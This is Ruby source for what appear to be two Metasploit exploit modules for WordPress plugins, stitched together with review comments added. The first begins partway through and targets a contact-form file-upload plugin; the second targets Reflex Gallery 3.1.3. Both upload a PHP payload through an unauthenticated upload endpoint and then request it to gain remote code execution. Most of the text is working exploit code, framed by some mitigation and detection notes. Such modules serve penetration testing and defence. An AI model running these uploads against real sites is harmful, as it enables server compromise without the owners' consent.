# Version check against the plugin readme; 1.5 is passed as the fixed version.
def check
check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
end
# Upload the PHP payload via admin-ajax, read the stored name from the JSON
# reply, then request that file to trigger execution.
def exploit
# Random 4-7 letter name with a .php extension (shorter than the sibling modules).
php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
data = Rex::MIME::Message.new
# NOTE(review): two parts are named "action" ('upload' here and
# 'nm_webcontact_upload_file' below); which one the server honours depends
# on its form parsing — presumably the last wins. Confirm before relying on it.
data.add_part('upload', nil, nil, 'form-data; name="action"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
post_data = data.to_s
res = send_request_cgi({
'uri' => wordpress_url_admin_ajax,
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
# The literal "filename" must appear in the body before JSON parsing is attempted.
if res.code == 200 && res.body =~ /filename/
begin
# The server-assigned name is authoritative; the requested name may be rewritten.
new_php_pagename = JSON.parse(res.body)["filename"]
rescue JSON::ParserError
fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename')
end
print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
# FileDropper removes the uploaded file once a session is established.
register_files_for_cleanup(new_php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
# NOTE(review): 'ERROR' tells the operator nothing; "no response from server" would.
fail_with(Failure::Unknown,'ERROR')
end
print_status("#{peer} - Calling payload...")
# Fetching the stored file is what runs the payload.
send_request_cgi(
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit exploit for the WordPress "Reflex Gallery" plugin 3.1.3. The
# plugin's FileUploader/php.php handler stores the uploaded file under
# wp-content/uploads/<Year>/<Month>/, with the year and month supplied by the
# client as query parameters, so the module computes them from the local clock
# to know where to request the file afterwards. Server-side mitigation: an
# extension allow-list on the upload handler and upgrading to the version the
# check below treats as fixed. Detection: a POST to
# .../reflex-gallery/admin/scripts/FileUploader/php.php with Year/Month query
# parameters, followed by a GET of a new .php name under wp-content/uploads/.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Reflex Gallery Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery
version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '36374'],
['OSVDB', '88853'],
['WPVDB', '7867']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Reflex Gallery 3.1.3', {}]],
'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date.
'DefaultTarget' => 0)
)
end
# Version check against the plugin readme; 3.1.4 is passed as the fixed version.
def check
check_plugin_version_from_readme('reflex-gallery', '3.1.4')
end
# Upload the PHP payload under a random name into the current year/month
# folder, then request it to trigger execution.
def exploit
# Random 8-15 letter name with a .php extension.
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
post_data = data.to_s
# Local clock; presumably must agree with the server's month for the later
# GET to hit the right folder — a mismatch around month boundaries would
# leave the file deployed but unreachable at the computed path.
time = Time.new
year = time.year.to_s
month = "%02d" % time.month
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
'method' => 'POST',
# NOTE(review): year and month are already Strings; the "#{...}" wrappers
# here and in the final request are redundant.
'vars_get' => {
'Year' => "#{year}",
'Month' => "#{month}"
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
# Success requires a 200 whose body mentions "success" or the chosen name.
if res.code == 200 && res.body =~ /success|#{php_pagename}/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
# FileDropper removes the uploaded file once a session is established.
register_files_for_cleanup(php_pagename)
else
# NOTE(review): the sibling modules use Failure::UnexpectedReply for this case.
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
print_status("#{peer} - Calling payload...")
# Fetching the stored file is what runs the payload.
send_request_cgi(
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
)
end
end